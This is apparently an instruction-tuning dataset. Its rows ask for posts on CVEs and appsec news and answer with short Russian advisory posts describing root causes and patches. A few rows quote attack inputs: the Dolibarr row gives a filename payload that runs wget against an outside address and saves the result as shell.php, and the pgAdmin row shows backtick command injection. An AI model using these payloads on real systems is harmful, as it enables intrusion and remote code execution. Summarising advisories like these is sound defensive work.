Instruction,Input,Response Write a post on the following topic,Linux Kernel information disclosure vulnerability analysis CVE-2020-28588,Linux Kernel /proc/pid/syscall information disclosure vulnerabilityДетальный разбор CVE-2020-28588 (раскрытие информации в Linux Kernel 5.1 и 5.4.66).https://talosintelligence.com/vulnerability_reports/TALOS-2020-1211 Write a post on the following topic,"""Developing a Proof of Concept for CVE-2020-28018 in Exim""",From theory to practice: analysis and PoC development for CVE-2020-28018 (Use-After-Free in Exim)...building a PoC for one of the vulnerabilities published by Qualys in Eximhttps://adepts.of0x.cc/exim-cve-2020-28018/ Write a post on the following topic,Trojan Source: вектор атаки на исходный код программного обеспечения,"Ученые изКембриджскогоуниверситетавСоединенномКоролевствераскрыли обнаруженный еще25июлявекторатакиTrojan Source, позволяющий внедрять уязвимости в исходный код программного обеспечения таким образом, чтобы рецензенты не могли их обнаружить, что создает угрозу популярному ПО и цепочкам поставок.Trojan Sourceиспользует простой прием, который не требует модификации компилятора или прочих ухищрений, затрагиваяC, C ++, C #, JavaScript, Java, Rust, Go и Python.Вся фишка состоит в использовании управляющих символовUnicodeдля изменения порядка токенов в исходном коде на уровне кодирования.Каквыяснилось, используя управляющие символы, встроенные в комментарии и строки, злоумышленник может переупорядочить исходный код, чтобы не меняя визуальной картинки изменить его логику таким образом, чтобы создать уязвимость, которую можно впоследствии поэксплуатировать.РеализацияTrojan Sourceпроисходит по двум сценариям:CVE-2021-42574(илидвунаправленнаяатака) иCVE-2021-42694(гомоглифическаяатака).В первом случае применяются элементы управленияUnicodeдля двунаправленного текста, чтобы определять направление, в котором отображается контент. К примеру,LRI и RLI.Двунаправленные (Bidi) элементы управленияLRIиRLIявляются невидимыми символами, и они не единственные. Вводя эти инструкции, компилятор может скомпилировать код, полностью отличный от того, что видит человек.Внедряя символы переопределенияUnicodeBidiв комментарии и строки, злоумышленник может создать синтаксически корректный исходный код на большинстве современных языков, для которого порядок отображения символов представляет собой логику, отличающуюся от реальной логики.Второй вариант атаки основывается на применениигомоглифов, то есть разных символов, которые хоть и имеют одинаковое визуальное представление, но реализуют разный функционал. Человеческий глаз будет видеть обе функции идентичными, в то время как компилятор различает латинскую «H» и кириллическую «H» и обрабатывает код как имеющий две разные функции, поэтому результат разным.Оказывается также, что символыBidiсохраняются при копировании/вставке в большинстве браузеров, редакторов и операционных систем.Trojan Sourceработает практически во редакторах кода и веб-репозиториях (оцените сами ниже втаблице)За свои изыскания научные деятели получили в среднем2 246 долларовпоbugbounty. НаGitHubонипредоставилиPoC, которые демонстрируют, насколько серьезной угрозой может быть атака: тем более, чтоTrojan Sourceзатрагивает почти все компьютерные языки, а патчи еще толком не выпущены, оставляя уязвимыми почти два десятка поставщиков программного обеспечения." Write a post on the following topic,Log4Shell уязвимость (CVE-2021-44228),"Ещё пара ссылок по теме Log4Shell (CVE-2021-44228):1.https://github.com/christophetd/log4shell-vulnerable-app— минимальный пример уязвимого приложения;2.https://github.com/Cybereason/Logout4Shell— ""вакцина"", эксплуатирующая уязвимость и изменяющая конфигурацию текущего экземпляра логгера атакованного приложения таким образом, чтобы сделать его неуязвимым к данной атаке :)" Write a post on the following topic,"""Unauthenticated RCE in H2 Database Console""","The JNDI Strikes Back – Unauthenticated RCE in H2 Database ConsoleVery recently, the JFrog security research team has disclosed an issue in the H2 database console which was issued a critical CVE – CVE-2021-42392. This issue has the same root cause as the infamous Log4Shell vulnerability in Apache Log4j (JNDI remote class loading).https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/" Write a post on the following topic,"""Обнаружение уязвимости удаленного выполнения кода в Java Spring Framework""","​​Встречайте,Spring4Shell. Правда, если сравнивать обнаруженнуюRCEв Java Spring FrameworkсLog4Shell, эффект которой можно назвать бомбой, то новая0-Dayскорее всего на этом фоне будет выглядеть как связка петард.Уязвимость удаленного выполнения кода былаобнаруженав среде Spring вскоре после того, как некий китайский исследователь, которыйвыпустилнаGitHubсоответствующийPoC, который вскоре после этого удалил вместе со своими аккаунтами.Spring- достаточно популярная платформа для создания приложений на основеJava EE (Enterprise Edition), которая позволяет быстро и легко их разрабатывать, а затем и разворачивать на серверах, в том числеApache Tomcat, в виде автономных пакетов со всеми необходимыми зависимостями.ПоданнымPraetorian, непропатченная уязвимость затрагиваетSpring CoreвJava Development Kit (JDK)версии 9 и более поздних и является обходом другой уязвимости, отслеживаемой как CVE-2010-1622, что позволяет злоумышленнику, не прошедшему проверку подлинности, выполнять произвольный код в целевой системе.Дополнительные сведения о новой уязвимости не разглашаются, специалисты по поддержке фреймворкаSpring.io, дочерняя компанияVMware, вовсю работают над исправлением.Новая бага отличается от двух предыдущих уязвимостей, раскрытых в структуре приложения на этой неделе, включаяDoS-уязвимость выраженийSpring Framework(CVE-2022-22950) и уязвимость доступа к ресурсам выраженийSpring Cloud(CVE-2022-22963).Spring RCEвызвана небезопасной десериализацией переданных аргументов.Praetorianтакже подтвердила, что ошибка зависит от определенных конфигураций для правильного использования. Для эксплуатации требуется конечная точка с включеннымDataBinder(например, запросPOST, который автоматически декодирует данные из тела запроса) и сильно зависит от контейнера сервлетов для приложения.Например, когдаSpringразвернут наApache Tomcat, доступенWebAppClassLoader, что позволяет злоумышленнику вызывать геттеры и сеттеры, чтобы в конечном итоге записать вредоносныйJSP-файл на диск. Однако, еслиSpringразвернут с использованием встроенного контейнера сервлетовTomcat, загрузчик классов — этоLaunchedURLClassLoader, доступ к которому ограничен.В некоторых конфигурациях эксплуатация этой проблемы проста, поскольку для этого требуется, чтобы злоумышленник отправил созданный запросPOSTв уязвимую систему.ПомнениюспециалистовFlashpoint, первоначальный анализ новой уязвимости выполнения кода вSpring Coreпредполагает, что ее влияние может быть несерьезным. Для эксплуатации уязвимости злоумышленникам необходимо будет найти и идентифицировать экземпляры веб-приложений, которые на самом деле используютDeserializationUtils.Кроме того, несмотря на общедоступность эксплойтов,Rapid7утверждают, что в настоящее время неясно, какие реальные приложения используют уязвимую функциональность.ISACзаявили, что еще не завершили свои тесты и не могут однозначно подтвердить действительностьPoCдля ошибкиRCE.Вместе с тем, согласно заключению аналитикаУилла ДорманнаизCERT/CC, эксплойтSpring4Shellв дикой природе все же функционирует и существуют реальные уязвимые приложения. Вообще, по данным источниковBleepingComputer, уязвимость активно используется в атаках.Поскольку для этой уязвимости в настоящее время нет исправления, настоятельно рекомендуется как можно скорее реализовать меры по смягчению атак, связанных с ограничениями функционалаSpring Core DataBinder." Write a post on the following topic,Новости из мира безопасной разработки,"Всем привет! 💥🎙 Сегодня начинаем еженедельную подборку новостей из мира безопасной разработки.Дайте знать реакциями как вам формат?📌Делимсярезультатами исследования Positive Technologies, проведенного на Positive Hack Days 11.📌Разоблачение популярных мифовоб аппаратных закладках в процессорах📌 3100 Django-приложенийоказались уязвимы из-за включённого режима отладки📌 Израильские исследователипредставили метод скрытой передачи данныхс помощью SATA-кабелей📌Краткий обзорнынешней ситуации в области пост-квантовой криптографии📌 Исследователи из NCC Groupопубликовали ряд уязвимостей протокола ExpressRLS— наиболее популярного на сегодняшний день протокола радиоуправления любительскими дронами📌 Разбор уязвимостиCVE-2022-21449 в Java 15-18, позволявшей обойти механизм проверки ECDSA-подписи и подделать подписываемое сообщение📌ОпубликованТОП докладов технического трекаPHDays 11📌Microsoftпредставила детальный разбор уязвимости, позволявшей выйти из песочницы OSX#мероприятия" Write a post on the following topic,Еженедельная подборка новостей в области кибербезопасности и разработки ПО,"🧾 Ловите еженедельную подборку новостей от POSIdev📌Опубликован код фреймворкарантайм-защиты Pulsar, ориентированный на IoT-инфраструктуры📌Что такое mass assignmentи как детектировать этот класс уязвимостей с помощью GitHub CodeSearch📌Детальный разбор CVE-2022-20186(LPE через Arm Mali GPU kernel driver) и техники её эксплуатации📌Автор деобфускатора REstringerподелился деталями его разработкии внутреннего устройства📌Опубликована очередная awesome-подборка. На этот раз - материалы и ресурсы, посвящённые криптографии открытого ключа📌Аналитики из Palo Alto Networksрассказали о том, что поиски уязвимых хостов в сети начинаются уже через 15 минут после публикации CVE об очередной уязвимости🔐" Write a post on the following topic,аналитика киберугроз и управление уязвимостями,"📝 Подборка новостей отPOSIdev◾️ Positive Technologiesопубликовали аналитику по киберугрозам за II квартал 2022 года◾️ В инфраструктуру языка Goдобавили средства управления уязвимостями◾️ Обновлена электронная версия книги Дениса Юричева ""SAT/SMT by Example""◾️ Драйвер античита игры Genshin Impactиспользовался в корпоративных атаках◾️Опубликован детальный разборуязвимости CVE-2022-31814 (RCE в pfBlockerNG)🔐#новости" Write a post on the following topic,"""Еженедельная подборка новостей о кибербезопасности от POSIdev""","📃Еженедельная подборка новостей от POSIdev📌Разбор свежей уязвимостик RCE через SSRF в Microsoft Office Online Server📌 Группа ресёрчеров Cybernewsподелилась результатами исследованияо раскрытии каталогов .git в opensource-проектах📌Первая часть статьи от Cyberark, посвящённая реверсингу руткитов и драйверов📌Новая реинкарнация старой уязвимостиот PortSwigger, HTTP/3 connection contamination📌 В Java-библиотеке Apache Commons Text найдена трендовая уязвимость (CVE-2022-42889), которая может привести к удаленному выполнению кода.Завтра мы выпустим про неё подробный материал💥_________________Хотите поделиться своей новостью? Пишите наtelegram@posidev.ioи мы опубликуем её в следующих постах.#новости" Write a post on the following topic,уязвимость CVE-2023-2825 в GitLab,"🔥Хотим рассказать о еще однойуязвимости CVE-2023-2825, которую считаем трендовой. Уязвимость с уровнем CVSS3.1: 10.0 затрагивает продукты GitLab Community и Enterprise Edition версии 16.0.0.🆘К чему может привестиНеавторизованный злоумышленник может использовать уязвимость обхода директорий для чтения произвольных файлов при условии существования публичного проекта управляемого как минимум пятью группами пользователей. Успешная эксплуатация может привести к раскрытию кода проектов, утечке учетных данных пользователей и другой чувствительной информации.Предположительно, проблема связана с тем, как именно GitLab работает с путями прикрепленных файлов, вложенных в несколько уровней иерархии групп. В связи с критически опасным уровнем уязвимости вендор настоятельно рекомендует выполнить обновление как можно быстрее.✅РекомендацииМы также рекомендуем выполнить оперативное обновление. Пока оно не будет произведено, необходимо контролировать публичные проекты, чтобы не допустить возможность эксплуатации уязвимости.💻 Информации о существовании публично доступного PoC или об эксплуатации уязвимости в хакерских атаках пока нет.#PositiveTechnologies" Write a post on the following topic,Уязвимость CVE-2023-42793 в JetBrains TeamCity,"⚠️ Внимание! Трендовая уязвимостьCVE-2023-42793в JetBrains TeamCity.TeamCity — решение для непрерывной интеграции и доставки ПО (CI/CD). Уязвимость вызвана недостаточным контролем доступа к API сервера и позволяет неаутентифицированному злоумышленнику получить доступ к панели администратора.Под угрозой находятся компании-разработчики ПО.Эксплуатация данной уязвимости позволяет злоумышленнику, имеющему сетевой доступ к серверу TeamCity, получить исходные коды проектов и развить дальнейшую атаку на инфраструктуру при помощи выполнения произвольного кода на агентах исполнения задач сборки проектов.Уязвимость может привести к недопустимым для вендоров событиям.❗️По рекомендациям вендора,для устранения уязвимости необходимо обновить сервер TeamCity до версии 2023.05.4. Для снижения рисков, связанных с уязвимостью, необходимо установить плагин с исправлением от вендора.🆘Что делатьПроверьте узлы на наличие уязвимостиCVE-2023-42793с помощьюMaxPatrol VM.Если установлены последние обновления базы знаний, уязвимые активы будут определены автоматически.@Positive_Technologies" Write a post on the following topic,Уязвимость CVE-2023-5009 в GitLab позволяет запустить пайплайн без контроля,"CVE-CVE-2023-5009 в системе контроля версии GitLab продуктов CE и EE версий от 13.12 до 16.2.7, от 16.3 до 16.3.4, позволяет запустить пайплайн через запланированные политики сканирования безопасности, что может привести к утечкам данных и к атакам на цепочки поставок. В рамках исправления уязвимостиcommitбыли внесены корректировки переменных, отвечающих за планирование политик (заменаschedule.owner `на `security_policy_botилиsecurity_policy_bot_2)" Write a post on the following topic,XSS-уязвимость в системе мониторинга сети LibRemMS,"CVE-CVE-2023-5060 в системе мониторинга сети LibRemMS, которая приводит к XSS. Для выполнения атаки достаточно ввести в поле IP4 поисковой формы"">. В процессе исправления уязвимости была добавлена функция экранирования HTML-спецсимволовhtmlspecialchars($_POST['address'])." Write a post on the following topic,Уязвимость XSS в приложении HestiaCP до версии 1.8.8,CVE-CVE-2023-5084 в приложении hestiacp до версии 1.8.8 (панель управления web-приложением) приводит к множественным XSS. Атака возможна с подменой параметровv_timezoneиv_backend_templateв теле запроса. Исправление уязвимостиcommitисключает использования параметраv_backend_templateдля формирования ответа и реализует проверку на «белый» список параметраv_timezone. Write a post on the following topic,Уязвимость выполнения произвольного кода в Dolibarr ERP CRM,"CVE-CVE-2023-38886 в системе Dolibarr ERP CRM до версии 17.0.1, позволяет привилегированному удаленному пользователю выполнить произвольный код. Для реализации атаки используется функционал backup и поле для ввода имени файла с полезной нагрузкойwget 192.168.1.167 && mv index.html shell.php. В приложении некорректно реализована функция санитизации введенного значения имени файла. Полный разбор уязвимости опубликован здесь." Write a post on the following topic,XSS уязвимость в почтовом веб-клиенте Roundcube,"CVE-CVE-2023-43770 в почтовом веб-клиенте Roundcube до 1.4.14, 1.5.x до 1.5.4, и 1.6.x до 1.6.3 позволяет выполнить XSS через полученное e-mail сообщение. Причина уязвимости заключается в отсутствии проверки пользовательских данных на символы<,>, в результате появляется возможность инъекции тегов html-кода. При исправлении проблемыcommitбыли добавлены символы<,>в шаблоны, используемые в контроле пользовательских данных." Write a post on the following topic,Уязвимость аутентификации в JetBrains TeamCity,"CVE-CVE-2023-42793 в JetBrains TeamCity до версии 2023.05.4 позволяет обойти процесс аутентификации и в последствии выполнить произвольный код на атакуемом сервере. Проблема заключается в неправильном паттерне пути запроса (/**/RPC2), для которого были отключены предобработчики, в том числе и предобработчик аутентификации. Злоумышленник может обратиться к произвольному пути, в конец которого добавить/RPC2, что позволит обойти механизмы защиты. Исправление уязвимости заключается в указании правильного паттерна пути для RPC2 -/RPC2." Write a post on the following topic,Уязвимость в pgAdmin позволяет выполнение произвольных системных команд.,"CVE-CVE-2023-5002 в платформе pgAdmin для администрирования PostgreSQL до версии 7.6 позволяет выполнить произвольные системные команды. Уязвимость заключается в отсутствии проверки значения параметраutility_pathв эндпойнте/misc/validate_binary_path, которое попадает в качестве первого аргумента в функциюsubprocess.getoutput.Первое исправлениене устранило уязвимость, была добавлена недостаточная санитизация пользовательских данных - замена одного символа двойной кавычки на два, что по прежнему позволяло выполнять произвольные команды, например, оборачивая их в обратные кавычки (``ls``). Вфинальном исправлениифункцияsubprocess.getoutputбыла реализована замена на более безопасный вариант -subprocess.runсshell=False.⁉️Хотите, чтобы эта#экспериментальная_рубрикастала постоянной? Ждём ваших реакций и комментариев👇" Write a post on the following topic,Интересные публикации по аппсеку за прошедшую неделю,"📌Наиболее интересные публикации по аппсеку за прошедшую неделю📰 Описание эффективной техникиобфускации in-memory сборок .NETот R-Tec.📰 И снова RSA, и снова Блейхенбахер, и снова оракулы...Оригиналстатьи о старой-новой атаке MARVIN, краткоесаммарина русском.📰Опытот VK по аппсеку внутренних ресурсов.📰 Краткаяисторияфункций парольного хэширования.📰 Очередная атака по побочным каналам, на этот раз на GPU, поэтому ""GPU.zip"".📰 Весьма годныйFAQпо проблемам безопасности многопоточных вычислений. Здесь же, нельзя не упомянуть о более ранних, но не менее годных статьях от PortSwigger на эту же тему (раз,два).📰 ДетальныйразборCVE-2023-35813 — атаки на древний, мамонтовый, но иногда всё ещё актуальный TemplateParser в ASP.Net WebForms.📰 Поучительнаяисторияо том, как DLL hijacking в WinDbg был исправлен в рамках багбаунти, но так и не получил подтверждённого CVE.📰Разборещё одной CVE-2023-38831, винрарной в самом прямом смысле этого слова🦄📰Статьяот Veracode об управлении секретами в условиях облачной разработки.⁉️Это — тоже#экспериментальная_рубрика. Что нужно делать, чтобы она стала постоянной, вы, впрочем, уже знаете👇" Write a post on the following topic,Уязвимость в Progress Software WS_FTP Server связанная с небезопасной .NET десериализацией,"CVE-CVE-2023-40044 в платформе для обмена даннымиProgress Software WS_FTP Serverдо версий8.7.4и8.8.2позволяет неаутентифицированному атакующему выполнять произвольные команды с помощью эксплуатации небезопасной .NET десериализации. Уязвимость заключается в использовании небезопасной реализацииBinaryFormatter.Deserializeдля десериализации пользовательских данных, полученных из POST multipart запроса к эндпойнтам модуля ""Ad Hoc Transfer"" (/AHT) и последующего формирования экземпляра классаSettingsStorageObject, в котором содержатся только три публичных поля типа массива символов. В таких случаях разработчикам было бы достаточно реализовать свойSerializationBinder, в котором ограничить использование типов или использовать иные методы заполнения полей при формирования экземпляров класса, но в патче только была вырезана уязвимая функциональность. Для эксплуатации достаточно стандартных стандартных цепочек гаджетов из набораysoserial.net(например,DataSet)." Write a post on the following topic,"Уязвимость в библиотеке libwebp, позволяющая выполнение записи за пределы кучи.","CVE-CVE-2023-4863 в библиотекеlibwebpдля обработки изображений формата WebP, исправленная в коммите902bc91,позволяет злоумышленнику выполнить запись за пределы кучи с помощью специально сформированногоwebpфайла. Уязвимость заключается в выделении буфераhuffman_tablesнекорректного размера внутри функцииReadHuffmanCodeи последующей записи в него данных, размер которых превышает это значение. Размерhuffman_tablesвычисляется на основе предварительно сформированного массиваkTableSize, который учитывает только размеры для поиска в 8-битной таблице первого уровня. Поскольку libwebp поддерживает коды длиной до 15 бит, проблема может возникнуть, когда функцияBuildHuffmanTableпопытается заполнить таблицы второго уровня. В патче была добавлена проверка корректности входных данных с помощью вызова функцииVP8LBuildHuffmanTableпри первом проходе (в котором еще не идет запись в таблицу Хаффмана) для расчета необходимого размера, если данные некорректны - выполнение завершается. Более подробный разбор уязвимости можно посмотреть вэтой статье." Write a post on the following topic,Уязвимость чтения файлов в Gladys Assistant,"CVE-CVE-2023-43256 в платформе домашнего ассистентаGladys Assistantпозволяет привилегированному удаленному пользователю читать произвольные файлы на сервере. Уязвимость заключается в отсутствии проверки значений входящих параметров запросаfolderиfileв обработчике запросаgetStreamingFile(/api/v1/service/rtsp-camera/camera/streaming/:folder/:file). Значения данных параметров участвуют в формировании пути (path.join(gladys.config.tempFolder, req.params.folder, req.params.file)) для возвращаемого в ответе файла. Впатчебыла добавлена проверка входящих значений по строгому паттерну (/index[0-9]+.ts/) или наличие в массиве допустимых значений['index.m3u8', 'index.m3u8.key', 'key_info_file.txt']дляfileи/^camera-[a-zA-Z0-9-_]+$/дляfolder)." Write a post on the following topic,Уязвимость удаления файлов в OpenCart (CVE-2023-2315),"CVE-CVE-2023-2315 в OpenCart с версии4.0.0.0до4.0.2.2позволяет аутентифицированному пользователю с правами на доступ/модификацию в компонентеLogудалять содержимое произвольных файлов на сервере. Уязвимость заключается в отсутствии санитизации параметра запросаfilenameу эндпойнтаtool/log.clear, который впоследствии попадает в функциюfopenс модификатором доступаw+для очистки файла.Патчдобавляет использование функцииbasenameпри извлечении из параметра запроса последнего компонента пути (имени файла)." Write a post on the following topic,Обработка и безопасность входных данных в программировании,"Всем привет!👋(@vkochetkovздесь)Отбирая статьи для понедельничной рубрики, наткнулся на забавноеэссе, посвящённое проверкам входных данных. Должен признаться, я в душе не чаю, кто его автор — признанный ли он эксперт или нет... вроде раньше не слышал🤔Но пройти мимо и не прокомментировать, не смог.Дело в том, что сей Pedram, предлагая решать проблему обработки входных данных «зря в корень», похоже, даже близко себе не представляет, где этот корень находится. Рассмотрим на примере первой части статьи. В ней автор рассматривает примеры решений одного из челленджей SecDim, основанного наCVE-2021-43798, и отбраковывает одно за другим, апеллируя к тому, что они не устраняют корень проблемы. Корень же Path Traversal, по убеждению автора, заключается в (я цитирую):> is the lack of path canonicalizationИ здесь он глубоко ошибается. Канонизация, нормализация, валидация, санитизация и прочие «-ации» хороши тогда, когда применяются на уровне модели предметной области, а не на уровне синтаксиса весьма низкоуровневых сущностей, коими являются файловые пути. Причиной уязвимости здесь является протаскивание этих сущностей на уровень предметной области, вместо сокрытия за абстракциями. И грамотным подходом в данном случае было бы не «отдать пользователю файл по запрошенному пути», а «отдать пользователю запрошенный по буквенно-числовому идентификатору объект», а уже связь между этими идентификаторами и физическими файлами, устанавливать без участия пользователя, где-то на стыке слоя представления и слоя бизнес-логики.Возможно для кого-то это и окажется откровением, но уязвимости в том числе к инъекциям, зачастую, и в первую очередь, являются проблемами дизайна предметной области приложения, и только потом — синтаксическими багами про недостаточную предварительную обработку.Btw, предложенное автором решение никак не защищает от, например, обращения к альтернативным потокам NTFS, если приложение окажется (не дай бог, конечно) развёрнутым под виндой. Как и от внедрения нуль-байта, управляющих символов и прочих DoS через жестко-заданные в ОС файловые имена. Зависит от окружения, конечно, но кто ж так в корень-то смотрит?🤦‍♂️И потом, если уж мы протащили файловые пути на уровень бизнес-логики, то реализуя тем самым требование «отдать пользователю существующий файл по запрошенному, жестко-заданному пути». И вот что мешало вспомнить о принципе KISS и сделать как-то так — ума не приложу:if not str.isidentifier(filename) or filename not in os.listdir(""/resources""):return HttpResponseBadRequest()(почему не с помощьюos.path.exists()— пусть будет домашним заданием)На две трети решённая задача обеспечения безопасности приложения — это грамотный дизайн его архитектуры и модели предметной области.А не вот это вот всё... 🫠❗️И да, это тоже#экспериментальная_рубрика. А вы как думали?👇" Write a post on the following topic,Уязвимость LDAP инъекции в phpIPAM до версии 1.5.2,"CVE-CVE-2023-41580 , обнаруженная в платформе управления IP-адресамиphpipamдо версии1.5.2,позволяет аутентифицированному атакующему получать конфиденциальные данные из хранилища через LDAP инъекцию. Уязвимость заключается в отсутствии санитизации пользовательских данных, попадающих в функцию$adldap->user()->info, которая формирует LDAP запросы для получения данных о пользователе. Висправленииданные, попадающие в LDAP запрос, проходят через экранирующую функциюldap_escapeс флагомLDAP_ESCAPE_DN." Write a post on the following topic,Уязвимость десериализации в клиенте Redisson до версии 3.22.0.,"CVE-CVE-2023-42809 в клиентеRedissonдо версии3.22.0позволяет исполнять произвольный код при подключении к вредоносному серверу. Уязвимость заключается в попадании пользовательских данных вфункциюObjectInputStream.readObjectи их небезопасной десериализации. Впатчебыл добавлен ""белый"" список классов, который определяет разрешенные объекты при десериализации. Упрощению эксплуатации способствует наличие в составе Redisson библиотеки ""Apache Commons Collections 4"", для которой существует стандартный ysoserial гаджет ""CommonsCollections2""." Write a post on the following topic,Аутентификационная уязвимость в социальной медиа платформе Misskey,"CVE-CVE-2023-43793 в децентрализованной социальной медиа платформеMisskeyдо версии2023.9.0позволяет обходить процесс аутентификации, для эндпойнтов, начинающихся с/queue. Проблема затрагивала процедуру сравнения пути эндпойнта сзакодированнымURI, что обеспечивало обход процесса аутентификации. ВисправленииURI запроса перед его сравнением декодируется при помощи функцииdecodeURI." Write a post on the following topic,"Уязвимость в библиотеке HtmlSanitizer, позволяющая обходить санитизацию HTML.","CVE-CVE-2023-44390 , выявленной в .NET библиотеке html-санитизацииHtmlSanitizerдо версии8.0.723, позволяет обходить процесс санитизации и добавлять вредоносные html-объекты. В библиотеке данные, находящиеся в комментариях или в текстовых полях html документа, обрабатывались без экранирования. Для этих случае впатчебыла добавлена замена символов""<""и"">""на их html-мнемоники (""<""и"">"")." Write a post on the following topic,"Уязвимость в библиотеке geokit-rails, позволяющая выполнение произвольных команд через небезопасную YAML десериализацию.","CVE-CVE-2023-26153 в библиотеке для работы с геолокациейgeokit-railsдо версии2.5.0позволяет неаутентифицированному атакующему выполнять произвольные команды с помощью эксплуатации небезопасной YAML десериализации. Проблема связана с попаданием значения""geo_location""куки в уязвимую функциюYAML.load. Дляисправленияуязвимости функциюYAML.loadзаменили на безопасную функциюJSON.parse." Write a post on the following topic,"""Уязвимость CVE-2023-44487 в протоколе HTTP/2""","CVE-CVE-2023-44487 в протоколеHTTP/2. Проблема связана с дизайном протокола HTTP/2 и касается возможности одностороннего сброса потока отправкойRST_STREAM, что в итоге позволяет создавать неограниченное количество новых потоков для сервера и приводит к отказу в обслуживании. Многие разработчики библиотек, реализующих протокол HTTP/2, уже добавляют механизмы контроля количества новых потоков (клон Nginxtengine,jetty,envoy, пакет gox/net/http2и т.д). Ссылку на подробный разбор ищите в нашем предыдущем новостном посте." Write a post on the following topic,Обход процесса валидации ID токена в платформе Micronaut Security.,"CVE-CVE-2023-36820 в платформеMicronaut Securityдо версий3.1.2, 3.2.4, 3.3.2, 3.4.3, 3.5.3, 3.6.6, 3.7.4, 3.8.4, 3.9.6, 3.10.2 и 3.11.1приводит к обходу процесса валидации IDтокена. Проблема заключается в отсутствии проверки значенияaudна соответствие идентификатору клиентапри условии, что в настройках значениеmicronaut.security.authenticationвыставлено вidtoken,а также значениеissсовпадает со значением текущего эмитента приложения. Впатческорректирована логика валидации токена через использование логического оператора ""и"" (&&) вместо""или"" (||)." Write a post on the following topic,Уязвимость DOM-based XSS в приложении Piwigo до версии 14.0.0beta4,"CVE-CVE-2023-44393 ,выявленная в приложенииPiwigoдо версии14.0.0beta4, приводит к возможности внедрения дополнительных DOM сущностей в состав HTML документа. Уязвимость заключается в отсутствии санитизации пользовательских данных ($_GET['plugin_id']), попадающих в переменную$activate_url, которая участвует в формировании тела ответа. Висправлениибыл исключен канал воздействия путем удаления$_GET['plugin_id']из формирования значения переменной$activate_url." Write a post on the following topic,"Уязвимость в веб-интерфейсе OctoPrint, позволяющая выполнение произвольного кода.","CVE-CVE-2023-41047 в веб-интерфейсе для 3D принтеровOctoPrintдо версии1.9.3позволяет привилегированным пользователям выполнять произвольный код путем создания специально сформированных GCODE-скриптов. Уязвимость состоит в использовании небезопасного jinja2-окруженияjinja2.sandbox.Environmentпри работе с шаблонами.Патчзаменяетjinja2.sandbox.Environmentна более безопасный вариант -jinja2.sandbox.SandboxedEnvironment,в котором при попытке исполнения небезопасного кода будет выдано исключениеjinja2.sandbox.SecurityError." Write a post on the following topic,Уязвимость в десериализации с использованием библиотеки pickle в платформе vantage6,"CVE-CVE-2023-23930 ,найденная в платформе для обученияvantage6до версии4.0.0, заключается в использовании небезопасной реализации процесса десериализации с использованием библиотекиpickle, что может привести к исполнению произвольного кода. Висправленииуязвимая функцияpickle.loadsбыла заменена на безопасный вариант -json.loads." Write a post on the following topic,Обзор новостей и обновлений в области информационной безопасности и аппсека,"📌Наиболее интересные публикации по аппсеку за прошедшую неделю📰 Обновился полезныйплагиндля Burp Suite, позволяющий разбирать сообщения Protobuf без наличия .proto-определений.📰РазборCVE-2023-2729 (использование небезопасного PRNG в девайсах Synology NAS).📰Объяснениеатак удлиннением сообщения и HMAC от небезызвестного Дениса Юричева.📰 Вновь очереднаяаббревиатурао том, как правильно писать код. Вновь на букву «S»... и вновь эта буква означает отнюдь не «Security» 😢 Но почитать всё же стоит, советы-то дельные.📰 Вышлопродолжениеувлекательнойстатьио разработке crackme-задания.📰РазборCVE-2023-34040 (RCE через небезопасную десериализацию в Spring Kafka).📰Переводлюбопытного эссе о рисках чрезмерного увлечения абстракциями в разработке." Write a post on the following topic,Уязвимость SQL-инъекции в LibreNMS,"CVE-CVE-2023-5591 , обнаруженная в системе мониторинга сетиLibreNMSдо версии23.10.0, приводит к SQL-инъекции. Проблема заключается в использовании значения параметраaddressиз POST-запроса в функции для формирования и исполнения SQL-запросаdbFetchRows. Дляисправленияуязвимости формирование SQL-запроса стало выполняться параметризированным способом." Write a post on the following topic,Уязвимость OS Command Injection в web-фреймворке web2py,"CVE-CVE-2023-45158 в web-фреймворкеweb2pyдо версии2.24.1для модуляmessageboxhandlerи функцииnotifySendHandlerобнаружена уязвимостьOS Command injection. Уязвимость заключается в возможности попадания пользовательских данных в функцию логирования, внутри которой данные обрабатываются с использованиемos.system. Впатчебыла произведена заменаos.systemнаsubprocess.runи пользовательские данные включены в элемент массива для аргумента команды, что исключает выполнение команды ОС." Write a post on the following topic,XSS уязвимость в плагине Discourse Calendar,"CVE-CVE-2023-43658 ,обнаруженная в плагине календаря дляDiscource dicourse-calendar, позволяет злоумышленникам внедрить произвольные html-сущности в состав ответа сервера, что приводит к XSS. Прямая запись пользовательских заголовков эвентов ( event_name ) в состав html-страницы, приводит к появлению данной проблемы.Патчдобавляет функциюCGI.escape_htmlдля конвертации недопустимых символов в их html-представления." Write a post on the following topic,Уязвимость stored XSS в Roundcube,"CVE-CVE-2023-5631 в почтовом web-клиентеRoundcubeдо версии1.4.15, 1.5.x до 1.5.5 и 1.6.x до 1.6.4может приводить к stored XSS в теле HTML сообщения электронной почты. Проблема находится в файлеprogram/lib/Roundcube/rcube_washtml.phpв функцииwash_uri, некорректно обрабатывающей разделительные символы для типа контента в составе URI SVG изображения. Впатчебыл введен механизм удаления разделительных символов из URI." Write a post on the following topic,"Уязвимость в веб UI Cisco IOS XE, позволяющая создание аккаунта с максимальными привилегиями.","CVE-CVE-2023-20198 в веб UI компонентеCisco IOS XEдо версий17.9.4a, 17.6.6a, 17.3.8a и 16.12.10aпозволяет неаутентифицированному злоумышленнику создать аккаунт с максимальным уровнем привилегий. Часть уязвимости заключается в логике проверки IPv6 адреса в функцииutils.isIpv6Address(ip), которая в ряде случаев используется для контроля данных, попадающих в состав cli-команд. В исправлении разработчики в механизме контроля IPv6 адреса скорректировали шаблон на^([a-fA-F0-9:]+)$и ввели дополнительные проверки на длину адреса и их значение." Write a post on the following topic,Интересные публикации по аппсеку за прошедшую неделю,"📌Наиболее интересные публикации по аппсеку за прошедшую неделю📰Препринтна тему вычисляемых вручную «хэш»-функций, пригодных для генерации пользовательских паролей «в уме».📰 Вышла первая версия инструментаde4py, облегчающего задачу реверсинга обфусцированного Python-кода.📰 Опубликованырезультатыочередного аудита кодовой базы Tor Browser командой экспертов Cure 53.📰Обзоринструментария и техник угона учётных данных из браузеров.📰 Весьма детальныйразборприроды DLL Hijacking, потрохов загрузчика библиотек Windows и универсальной техники эксплуатации данной уязвимости.📰Статья, описывающая развитие рядовой Unrestricted File Upload до RCE на примере CVE-2021-27198 (загрузка произвольных файлов в Visualware MyConnection Server).📰 Подробноеописаниеархитектуры и принципов работы фаззера Cascade, предназначенного для тестирования RISC-V процессоров, через генерацию и выполнение корректных, объёмных и сложных программ." 